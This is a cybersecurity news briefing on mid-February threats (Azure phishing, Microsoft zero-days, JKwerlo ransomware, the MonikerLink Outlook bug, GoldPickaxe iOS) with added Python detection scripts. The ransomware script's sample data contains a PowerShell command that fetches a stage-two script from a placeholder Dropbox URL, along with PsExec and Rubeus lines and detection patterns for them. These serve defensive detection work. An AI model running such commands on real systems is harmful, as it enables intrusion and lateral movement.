Cyber Security Briefing, 10 - 16 February
Microsoft Azure Account Hijacking Campaign
Proofpoint has published an analysis about a new campaign in which a cybercriminal group distributes phishing emails to employees to gain access to their Microsoft Azure and Office 365 accounts. Through those emails, they redirect victims to a fake Microsoft login.
As for post-exploitation activities, they use a specific user agent string to access various Microsoft 365 applications, such as Exchange Online, My Signins, My Apps and My Profile, in addition to employing proxies or data hosting services to hide their operational infrastructure. It should be noted that they especially target employees who have more privileges within their organizations, such as directors, managers and executives.
Proofpoint recommends several measures such as monitoring user agent string usage and source domains, resetting compromised passwords, using security tools to detect events or applying standard anti-phishing mitigations.
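The monitoring that Proofpoint recommends (user agent strings, source addresses, the applications touched after login, and which users are being targeted) can be expressed as a small correlation over sign-in records. The following is an added example, not Proofpoint's tooling or any Microsoft API: the JSON-lines log format, the sample records and the watchlisted user-agent value are constructed placeholders, since the briefing does not reproduce the campaign's actual string.

```python
"""Detection sketch for the Azure / Microsoft 365 account-hijacking tradecraft
described above: flag sign-ins that use a watchlisted user agent, note whether
they touch the applications the actors were seen using, and whether the user
holds a privileged job title. Added example with constructed data."""
import json
from typing import Dict, List

# Placeholder: the campaign's real user-agent string is not given in the
# briefing; populate this watchlist from the vendor report.
WATCHLIST_USER_AGENTS = {"PLACEHOLDER-CAMPAIGN-UA/1.0"}

# Microsoft 365 applications named as post-compromise targets.
TARGET_APPS = {"Exchange Online", "My Signins", "My Apps", "My Profile"}

# Job-title keywords corresponding to the roles said to be preferentially targeted.
PRIVILEGED_TITLES = {"director", "manager", "executive", "ceo", "cfo"}

# Constructed sample sign-in records (JSON lines), not real telemetry.
SAMPLE_SIGNIN_LOG = """\
{"ts":"2024-02-12T08:01:10Z","user":"alice@example.test","title":"Sales Manager","app":"My Signins","ua":"PLACEHOLDER-CAMPAIGN-UA/1.0","ip":"203.0.113.10","result":"success"}
{"ts":"2024-02-12T08:02:44Z","user":"alice@example.test","title":"Sales Manager","app":"Exchange Online","ua":"PLACEHOLDER-CAMPAIGN-UA/1.0","ip":"203.0.113.10","result":"success"}
{"ts":"2024-02-12T09:15:00Z","user":"bob@example.test","title":"Analyst","app":"Teams","ua":"Mozilla/5.0 (Windows NT 10.0) Edge/121.0","ip":"198.51.100.7","result":"success"}
{"ts":"2024-02-12T09:20:31Z","user":"carol@example.test","title":"Finance Director","app":"My Profile","ua":"PLACEHOLDER-CAMPAIGN-UA/1.0","ip":"203.0.113.55","result":"failure"}
"""


def is_privileged(title: str) -> bool:
    """True if any word of the job title is on the privileged-role list."""
    words = title.lower().replace("-", " ").split()
    return any(w in PRIVILEGED_TITLES for w in words)


def score_signin(rec: Dict) -> List[str]:
    """Return the list of suspicious signals present in one sign-in record."""
    reasons = []
    if rec.get("ua") in WATCHLIST_USER_AGENTS:
        reasons.append("watchlisted user agent")
    if rec.get("app") in TARGET_APPS:
        reasons.append("post-compromise app: " + rec["app"])
    if is_privileged(rec.get("title", "")):
        reasons.append("privileged target")
    return reasons


def detect(log_text: str) -> List[Dict]:
    """Scan JSON-lines sign-in records; alert on every watchlisted-UA sign-in.

    A successful sign-in that also touches a target app for a privileged user
    is rated high; anything else with the watchlisted agent is rated medium."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        reasons = score_signin(rec)
        if "watchlisted user agent" not in reasons:
            continue
        high = rec.get("result") == "success" and len(reasons) == 3
        alerts.append({
            "user": rec["user"], "ip": rec["ip"], "app": rec["app"],
            "severity": "high" if high else "medium", "reasons": reasons,
        })
    return alerts


def users_to_reset(alerts: List[Dict]) -> List[str]:
    """Accounts with a high-severity alert: candidates for a password reset
    and session revocation, per the recommendations above."""
    return sorted({a["user"] for a in alerts if a["severity"] == "high"})


def source_ips(alerts: List[Dict]) -> List[str]:
    """Source addresses seen with the watchlisted agent, for enrichment
    against proxy / hosting-provider lists."""
    return sorted({a["ip"] for a in alerts})


if __name__ == "__main__":
    found = detect(SAMPLE_SIGNIN_LOG)
    for a in found:
        print(a["severity"], a["user"], a["app"], a["ip"], "; ".join(a["reasons"]))
    print("reset:", users_to_reset(found))
    print("ips:", source_ips(found))
```

On the constructed log this produces two high alerts for the manager whose mailbox and sign-in settings were accessed and one medium alert for the failed attempt against the finance director; the user-agent match is the gating condition because a single string reused across an infrastructure of proxies is the most stable indicator the briefing describes.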
Microsoft patches two actively exploited 0-days
Microsoft has released new updates in the context of February's Patch Tuesday, patching a total of 73 vulnerabilities, 30 of which would allow an attacker to execute remote code. Among the fixed flaws, two actively exploited 0-days stand out: CVE-2024-21351 and CVE-2024-21412, both rated as high severity flaws according to Microsoft. The first of them would allow a threat actor to bypass Windows SmartScreen security controls.
However, in order to exploit it, an authorized attacker would first have to convince the user to open a malicious file. Microsoft has not detailed how, or by which threat actor, this vulnerability has been exploited. On the other hand, CVE-2024-21412 affects Internet Shortcut Files and would allow an unauthenticated attacker to send the user a specially crafted file that bypasses Mark of the Web (MoTW) security controls.
Moreover, according to Trend Micro this flaw has been exploited by the threat actor Water Hydra to deploy the DarkMe Remote Access Trojan (RAT).
JKwerlo ransomware targets Spanish and French users
Researchers at Cyble Research & Intelligence Labs (CRIL) have discovered a new ransomware written in Go which they have named JKwerlo and whose attacks target Spanish and French-speaking users.
Initial access appears to be gained through phishing emails with a legal pretext, carrying HTML attachments and embedded ZIP files that either directly deploy the ransomware payload, as is the case with the Spanish emails, or initiate a series of events that end with the deployment of the ransomware, as observed in the French emails.
In the French campaign, PowerShell scripts were observed downloading and executing further files from Dropbox, finally executing another PowerShell script that deploys JKwerlo. Likewise, this ransomware uses PsExec and Rubeus to move laterally across the network, deleting Resmon.exe and Taskmgr.exe in the process so that its activity is not monitored.
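The French-campaign chain described above (PowerShell fetching stages from Dropbox, PsExec and Rubeus for lateral movement, deletion of Resmon.exe and Taskmgr.exe) gives three independent signals that a host-level correlation can combine. The following is an added example, not CRIL's analysis or any product rule: it classifies constructed Sysmon-style process-creation and file-deletion events and raises an incident for a host where two or more distinct signals fall within one time window. The event schema, host names and command lines are constructed placeholders.

```python
"""Correlate host events for the JKwerlo-style chain described above.
Added example with a constructed event schema; not the vendor's detection."""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# PowerShell download primitives, matched case-insensitively on whole words.
DOWNLOAD_CMDLETS = re.compile(
    r"\b(invoke-webrequest|iwr|downloadfile|downloadstring|start-bitstransfer)\b", re.I)
LATERAL_TOOLS = {"psexec.exe", "psexesvc.exe", "rubeus.exe"}
# Monitoring utilities the ransomware was observed deleting.
PROTECTED_BINARIES = {"resmon.exe", "taskmgr.exe"}

# Constructed sample events (JSON lines; raw string keeps the JSON backslash escapes).
SAMPLE_EVENTS = r"""
{"ts":"2024-02-13T10:00:00Z","host":"WS01","type":"ProcessCreate","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -nop -w hidden -c \"Invoke-WebRequest -Uri https://www.dropbox.com/s/PLACEHOLDER/stage2.ps1 -OutFile C:\\Users\\Public\\s2.ps1\""}
{"ts":"2024-02-13T10:04:12Z","host":"WS01","type":"ProcessCreate","image":"C:\\Users\\Public\\psexec.exe","cmdline":"psexec.exe \\\\WS02 -s cmd.exe"}
{"ts":"2024-02-13T10:05:30Z","host":"WS01","type":"FileDelete","image":"C:\\Users\\Public\\payload.exe","target":"C:\\Windows\\System32\\Taskmgr.exe"}
{"ts":"2024-02-13T10:06:00Z","host":"WS02","type":"ProcessCreate","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe Get-Process | Sort-Object CPU"}
{"ts":"2024-02-13T11:30:00Z","host":"WS02","type":"ProcessCreate","image":"C:\\Temp\\rubeus.exe","cmdline":"rubeus.exe triage"}
"""


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def classify(ev: Dict) -> Optional[str]:
    """Map one event to a rule name, or None if it matches nothing."""
    image = _basename(ev.get("image", ""))
    if ev.get("type") == "ProcessCreate":
        cmd = ev.get("cmdline", "")
        if (image in ("powershell.exe", "pwsh.exe")
                and "dropbox.com" in cmd.lower() and DOWNLOAD_CMDLETS.search(cmd)):
            return "powershell_dropbox_download"
        if image in LATERAL_TOOLS:
            return "lateral_movement_tool"
    elif ev.get("type") == "FileDelete":
        if _basename(ev.get("target", "")) in PROTECTED_BINARIES:
            return "monitoring_tool_tampering"
    return None


def correlate(log_text: str, window_minutes: int = 30) -> Dict[str, List[str]]:
    """Return {host: sorted rule names} for hosts where at least two distinct
    rules fired within `window_minutes` of the host's first hit."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        rule = classify(ev)
        if rule:
            ts = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
            hits[ev["host"]].append((ts, rule))
    incidents = {}
    for host, items in hits.items():
        items.sort()
        first = items[0][0]
        window = timedelta(minutes=window_minutes)
        rules = {r for t, r in items if t - first <= window}
        if len(rules) >= 2:
            incidents[host] = sorted(rules)
    return incidents


if __name__ == "__main__":
    for host, rules in correlate(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(rules))
```

Each rule on its own is noisy (administrators run PsExec; PowerShell legitimately talks to Dropbox), which is why the example only escalates when signals that belong to different phases of the chain coincide on one host; the single Rubeus launch on the second host is left for triage rather than raised as an incident.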
#MonikerLink bug, an RCE vulnerability in Outlook
A Check Point researcher has discovered a security flaw in Outlook that allows remote access to resources and code execution through the use of a malicious link. The problem is due to the use of an insecure API (MkParseDisplayName) that treats the link as a Moniker Link, a way of looking for COM objects in Windows, which can invoke applications such as Word or Excel as COM servers and exploit their vulnerabilities.
It is worth noting that the flaw is not only in Outlook but also in other programs that use the API, a risk comparable to Log4Shell. The vulnerability, for which a PoC exists, has been identified as CVE-2024-21413 with a CVSS score of 9.8 and affects the latest versions of Windows and Office.
GoldPickaxe trojan for iOS steals biometric data
Cybersecurity group Group-IB has discovered a new iOS Trojan called GoldPickaxe.iOS, designed to steal facial recognition data, identity documents and intercept SMS. The threat has been attributed to the GoldFactory group.
The trojan has been active since mid-2023 in Asia, mainly in Thailand and Vietnam. The attack method is to impersonate local banks and government organizations. The threat actor uses AI-based services to create deepfakes, allowing unauthorized access to victims' bank accounts. Mobile Device Management (MDM) has been used to manipulate Apple devices and malicious links have been distributed via messaging to lure victims to fraudulent apps.